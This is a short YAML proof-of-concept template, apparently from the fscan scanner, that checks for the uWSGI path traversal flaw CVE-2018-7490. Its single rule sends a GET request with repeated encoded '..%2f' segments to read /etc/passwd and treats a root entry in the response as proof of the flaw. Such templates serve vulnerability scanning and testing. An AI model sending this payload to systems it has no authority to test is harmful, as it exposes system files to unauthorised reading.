mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-11-05 10:45:27 +00:00
10 lines
386 B
YAML
10 lines
386 B
YAML
|
|
name: poc-yaml-uwsgi-cve-2018-7490
|
||
|
|
rules:
|
||
|
|
- method: GET
|
||
|
|
path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
|
||
|
|
follow_redirects: false
|
||
|
|
expression: |
|
||
|
|
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||
|
|
detail:
|
||
|
|
links:
|
||
|
|
- https://github.com/vulhub/vulhub/tree/master/uwsgi/CVE-2018-7490
|